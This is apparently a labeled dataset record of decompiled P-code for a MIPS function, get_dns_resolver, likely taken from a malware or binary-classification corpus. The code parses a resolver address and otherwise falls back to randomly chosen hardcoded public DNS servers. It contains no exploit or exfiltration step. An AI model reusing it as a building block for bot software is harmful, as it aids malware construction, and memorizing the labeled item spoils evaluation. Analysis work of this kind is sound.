Label: 54
Function: get_dns_resolver
Architecture: mips
Source File: Unknown
Entry Point: 0040c47c

High-level P-code:

 ---  CALL (ram, 0x4108dc, 8) , (stack, 0xfffffffffffff7a8, 1)
(stack, 0xfffffffffffff7a8, 1) SUBPIECE (unique, 0x100000d7, 4) , (const, 0x0, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0xc, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0xc, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0xc, 4)
(unique, 0x100000d7, 4) INT_RIGHT (unique, 0x100000eb, 4) , (const, 0x18, 4)
(unique, 0x100000eb, 4) CAST (stack, 0xfffffffffffff7a8, 4)
(register, 0x8, 4) CALL (ram, 0x4109a4, 8) , (unique, 0x100000ef, 4) , (stack, 0xfffffffffffff7ac, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0x10, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0x10, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0x10, 4)
(unique, 0x100000ef, 4) CAST (stack, 0xfffffffffffff7a8, 4)
(register, 0x8, 4) CALL (ram, 0x41f878, 8) , (register, 0x8, 4) , (const, 0x0, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0x14, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0x14, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0x14, 4)
 ---  CALL (ram, 0x410940, 8) , (stack, 0xfffffffffffff7a8, 1)
(stack, 0xfffffffffffff7a8, 1) SUBPIECE (unique, 0x100000db, 4) , (const, 0x0, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0x1b, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0x1b, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0x1b, 4)
(unique, 0x100000db, 4) INT_RIGHT (unique, 0x100000f3, 4) , (const, 0x18, 4)
(unique, 0x100000f3, 4) CAST (stack, 0xfffffffffffff7a8, 4)
(unique, 0x1600, 1) INT_SLESS (const, 0xffffffff, 4) , (register, 0x8, 4)
 ---  CBRANCH (ram, 0x40c6c8, 1) , (unique, 0x1600, 1)
(register, 0x8, 4) PTRSUB (register, 0x74, 4) , (const, 0xfffff7d8, 4)
(register, 0x8, 4) CALL (ram, 0x41fa08, 8) , (register, 0x8, 4) , (register, 0x8, 4) , (const, 0x800, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0x2a, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0x2a, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0x2a, 4)
 ---  CALL (ram, 0x41f008, 8) , (register, 0x8, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0x34, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0x34, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0x34, 4)
 ---  CALL (ram, 0x4108dc, 8) , (stack, 0xfffffffffffff7a8, 1)
(stack, 0xfffffffffffff7a8, 1) SUBPIECE (unique, 0x100000df, 4) , (const, 0x0, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0x37, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0x37, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0x37, 4)
(unique, 0x100000df, 4) INT_RIGHT (unique, 0x100000f7, 4) , (const, 0x18, 4)
(unique, 0x100000f7, 4) CAST (stack, 0xfffffffffffff7a8, 4)
 ---  CALL (ram, 0x4109a4, 8) , (unique, 0x100000fb, 4) , (stack, 0xfffffffffffff7ac, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0x3b, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0x3b, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0x3b, 4)
(unique, 0x100000fb, 4) CAST (stack, 0xfffffffffffff7a8, 4)
(register, 0x8, 4) CALL (ram, 0x4116b0, 8) , (stack, 0xfffffffffffff7a8, 4) , (unique, 0x100000ff, 4) , (stack, 0xfffffffffffff7b0, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0x44, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0x44, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0x44, 4)
(unique, 0x100000ff, 4) CAST (stack, 0xfffffffffffff7ac, 4)
 ---  CALL (ram, 0x410940, 8) , (stack, 0xfffffffffffff7a8, 1)
(stack, 0xfffffffffffff7a8, 1) SUBPIECE (unique, 0x100000e3, 4) , (const, 0x0, 4)
(stack, 0xfffffffffffff7a8, 4) INDIRECT (stack, 0xfffffffffffff7a8, 4) , (const, 0x4b, 4)
(stack, 0xfffffffffffff7ac, 4) INDIRECT (stack, 0xfffffffffffff7ac, 4) , (const, 0x4b, 4)
(stack, 0xfffffffffffff7b0, 4) INDIRECT (stack, 0xfffffffffffff7b0, 4) , (const, 0x4b, 4)
(unique, 0x100000e3, 4) INT_RIGHT (unique, 0x10000103, 4) , (const, 0x18, 4)
(unique, 0x10000103, 4) CAST (stack, 0xfffffffffffff7a8, 4)
(unique, 0x1200, 1) INT_NOTEQUAL (register, 0x8, 4) , (const, 0xffffffff, 4)
 ---  CBRANCH (ram, 0x40c6c8, 1) , (unique, 0x1200, 1)
(unique, 0x100000ab, 1) COPY (const, 0x0, 1)
(unique, 0x100000ae, 1) COPY (const, 0x0, 1)
 ---  BRANCH (ram, 0x40c688, 1)
(unique, 0x100000e7, 4) COPY (register, 0x8, 4)
(unique, 0x2f00, 1) LOAD (const, 0x1a1, 4) , (unique, 0x100, 4)
(unique, 0x100000c3, 4) PTRSUB (register, 0x74, 4) , (const, 0xfffff7d8, 4)
(unique, 0x100, 4) PTRADD (unique, 0x100000c3, 4) , (stack, 0xfffffffffffff7c0, 4) , (const, 0x1, 4)
 ---  CBRANCH (ram, 0x40c5c0, 1) , (unique, 0x100000a6, 1)
(unique, 0x1200, 1) INT_NOTEQUAL (unique, 0x2f00, 1) , (const, 0x20, 1)
 ---  CBRANCH (ram, 0x40c674, 1) , (unique, 0x1200, 1)
(unique, 0x1200, 1) INT_NOTEQUAL (unique, 0x2f00, 1) , (const, 0x9, 1)
 ---  CBRANCH (ram, 0x40c674, 1) , (unique, 0x1200, 1)
(unique, 0x100000a9, 1) COPY (const, 0x1, 1)
(unique, 0x100000a8, 1) MULTIEQUAL (unique, 0x100000a6, 1) , (unique, 0x100000a9, 1)
(unique, 0x1200, 1) INT_NOTEQUAL (unique, 0x2f00, 1) , (const, 0x2e, 1)
 ---  CBRANCH (ram, 0x40c5f8, 1) , (unique, 0x1200, 1)
(unique, 0x5180, 1) INT_SLESS (unique, 0x2f00, 1) , (const, 0x30, 1)
 ---  CBRANCH (ram, 0x40c614, 1) , (unique, 0x5180, 1)
(unique, 0x5180, 1) INT_SLESS (const, 0x39, 1) , (unique, 0x2f00, 1)
 ---  CBRANCH (ram, 0x40c614, 1) , (unique, 0x5180, 1)
(register, 0x8, 4) INT_ADD (register, 0x8, 4) , (const, 0xffffffff, 4)
(unique, 0x1700, 1) INT_EQUAL (stack, 0xfffffffffffff7c0, 4) , (register, 0x8, 4)
 ---  CBRANCH (ram, 0x40c678, 1) , (unique, 0x1700, 1)
 ---  CALL (ram, 0x410f50, 8) , (stack, 0xfffffffffffff7a8, 4) , (stack, 0xfffffffffffff7ac, 4) , (unique, 0x10000107, 4)
(unique, 0x10000107, 4) CAST (stack, 0xfffffffffffff7b0, 4)
(register, 0x8, 4) INT_SUB (stack, 0xfffffffffffff7c0, 4) , (register, 0x8, 4)
 ---  STORE (const, 0x1a1, 4) , (unique, 0x100, 4) , (const, 0x0, 1)
(unique, 0x100000cf, 4) PTRSUB (register, 0x74, 4) , (const, 0xffffffd8, 4)
(unique, 0x100, 4) PTRADD (unique, 0x100000cf, 4) , (register, 0x8, 4) , (const, 0x1, 4)
(unique, 0x100000ad, 1) COPY (const, 0x1, 1)
 ---  BRANCH (ram, 0x40c6a0, 1)
(unique, 0x100000aa, 1) MULTIEQUAL (unique, 0x100000a6, 1) , (unique, 0x100000a6, 1) , (unique, 0x100000a8, 1)
(register, 0x8, 4) INT_ADD (stack, 0xfffffffffffff7c0, 4) , (const, 0x1, 4)
(stack, 0xfffffffffffff7c0, 4) MULTIEQUAL (unique, 0x100000e7, 4) , (register, 0x8, 4)
(unique, 0x100000a6, 1) MULTIEQUAL (unique, 0x100000ab, 1) , (unique, 0x100000aa, 1)
(unique, 0x5080, 1) INT_SLESS (stack, 0xfffffffffffff7c0, 4) , (register, 0x8, 4)
 ---  CBRANCH (ram, 0x40c570, 1) , (unique, 0x5080, 1)
(unique, 0x100000ac, 1) MULTIEQUAL (unique, 0x100000ae, 1) , (unique, 0x100000ad, 1)
 ---  CBRANCH (ram, 0x40c6c8, 1) , (unique, 0x100000ac, 1)
(register, 0x8, 4) PTRSUB (register, 0x74, 4) , (const, 0xffffffd8, 4)
(register, 0x8, 4) CALL (ram, 0x4003b0, 8) , (register, 0x8, 4)
(register, 0x8, 4) CALL (ram, 0x40f524, 8)
(register, 0x8, 4) INT_AND (register, 0x8, 4) , (const, 0x3, 4)
(unique, 0x1200, 1) INT_EQUAL (register, 0x8, 4) , (const, 0x3, 4)
 ---  CBRANCH (ram, 0x40c768, 1) , (unique, 0x1200, 1)
(unique, 0x5280, 1) INT_LESS (register, 0x8, 4) , (const, 0x4, 4)
 ---  CBRANCH (ram, 0x40c780, 1) , (unique, 0x5280, 1)
(unique, 0x1200, 1) INT_EQUAL (register, 0x8, 4) , (const, 0x2, 4)
 ---  CBRANCH (ram, 0x40c750, 1) , (unique, 0x1200, 1)
(unique, 0x5280, 1) INT_LESS (register, 0x8, 4) , (const, 0x3, 4)
 ---  CBRANCH (ram, 0x40c780, 1) , (unique, 0x5280, 1)
(unique, 0x1200, 1) INT_EQUAL (register, 0x8, 4) , (const, 0x0, 4)
 ---  CBRANCH (ram, 0x40c720, 1) , (unique, 0x1200, 1)
(unique, 0x1200, 1) INT_EQUAL (register, 0x8, 4) , (const, 0x1, 4)
 ---  CBRANCH (ram, 0x40c738, 1) , (unique, 0x1200, 1)
(register, 0x8, 4) CALL (ram, 0x422288, 8) , (const, 0x8080808, 4)
 ---  BRANCH (ram, 0x40c780, 1)
(register, 0x8, 4) CALL (ram, 0x422288, 8) , (const, 0x4a522a2a, 4)
 ---  BRANCH (ram, 0x40c780, 1)
(register, 0x8, 4) CALL (ram, 0x422288, 8) , (const, 0x40064006, 4)
 ---  BRANCH (ram, 0x40c780, 1)
(register, 0x8, 4) CALL (ram, 0x422288, 8) , (const, 0x4020202, 4)
 ---  BRANCH (ram, 0x40c780, 1)
(register, 0x8, 4) MULTIEQUAL (register, 0x8, 4) , (register, 0x8, 4) , (register, 0x8, 4) , (register, 0x8, 4) , (register, 0x8, 4) , (register, 0x8, 4) , (register, 0x8, 4)
(register, 0x8, 4) COPY (register, 0x8, 4)
 ---  RETURN (const, 0x0, 4) , (register, 0x8, 4)
 ---  RETURN (const, 0x0, 4) , (register, 0x8, 4)
